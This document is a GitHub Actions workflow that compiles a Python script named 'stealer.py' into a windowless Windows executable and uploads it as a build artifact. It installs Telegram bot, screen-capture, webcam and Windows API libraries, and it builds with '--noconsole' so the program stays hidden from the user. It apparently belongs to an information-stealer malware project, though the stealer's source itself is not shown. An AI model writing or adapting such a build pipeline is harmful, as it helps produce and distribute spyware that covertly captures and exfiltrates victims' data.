name: Build EXE
on: [push]
jobs:
  build:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install Python
        uses: actions/setup-python@v5
        with:
          python-version: '3.9'
      - name: Install dependencies
        run: |
          pip install pyTelegramBotAPI Pillow opencv-python pywin32 pyautogui requests pyinstaller
      - name: Build with PyInstaller
        run: |
          # Собираем в папку, а не в один файл, чтобы не было ошибок конфигурации
          pyinstaller --noconsole --collect-all cv2 --collect-all pyautogui stealer.py
      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: stealer-dist
          path: dist/stealer/
